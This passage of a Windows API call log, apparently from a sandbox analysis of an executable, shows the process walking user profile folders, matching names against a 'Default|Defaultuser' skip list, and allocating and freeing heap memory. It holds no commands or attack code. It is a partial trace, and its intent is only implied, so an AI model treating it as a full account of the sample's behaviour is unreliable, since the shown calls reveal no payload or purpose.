dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.048] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb00 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9091f8 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ae0 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9239c8 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0157.048] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0157.048] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0157.048] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0157.049] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0157.049] FindNextFileW (in: hFindFile=0x91d5e8, lpFindFileData=0x87ed20 | out: lpFindFileData=0x87ed20*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8a7560, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0157.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0157.049] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.049] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.049] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.049] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.049] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.049] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.049] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.049] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.049] FindNextFileW (in: hFindFile=0x91d5e8, lpFindFileData=0x87ed20 | out: lpFindFileData=0x87ed20*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0157.049] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.049] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.049] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.049] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.049] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.049] FindNextFileW (in: hFindFile=0x91d5e8, lpFindFileData=0x87ed20 | out: lpFindFileData=0x87ed20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x87f218, dwReserved1=0x8a7560, cFileName="Public", cAlternateFileName="")) returned 1 [0157.049] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.049] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.050] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.050] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.050] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.050] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.050] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.050] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.050] FindNextFileW (in: hFindFile=0x91d5e8, lpFindFileData=0x87ed20 | out: lpFindFileData=0x87ed20*(dwFileAttributes=0xaa00a8, ftCreationTime.dwLowDateTime=0x3a26, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0xb000a9, nFileSizeHigh=0x3a26, nFileSizeLow=0x9ba3a8, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Pu\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.050] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.050] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.050] FindClose (in: hFindFile=0x91d5e8 | out: hFindFile=0x91d5e8) returned 1 [0157.050] PeekMessageW (in: lpMsg=0x87f2ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f2ec) returned 0 [0157.050] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.050] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ult|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lt|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="faultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="user|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="faultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="user0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efault User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fault User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ault User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ult User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lt User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" User", cchCount1=1, lpString2="?", cchCount2=1) returned 1 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ult|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lt|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="faultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.052] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="user|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="faultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="user0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efault User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fault User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ault User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ult User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lt User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" User", cchCount1=1, lpString2="*", cchCount2=1) returned 1 [0157.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0157.054] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.054] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.054] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.054] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.054] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.054] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0157.054] PeekMessageW (in: lpMsg=0x87f014, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f014) returned 0 [0157.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0157.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba090 [0157.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0157.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0157.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0157.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0157.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba648 [0157.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0157.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba450 [0157.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0157.054] PeekMessageW (in: lpMsg=0x87f014, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f014) returned 0 [0157.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea60 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0157.055] PeekMessageW (in: lpMsg=0x87f014, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f014) returned 0 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea60 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0157.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0157.055] PeekMessageW (in: lpMsg=0x87f014, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f014) returned 0 [0157.055] 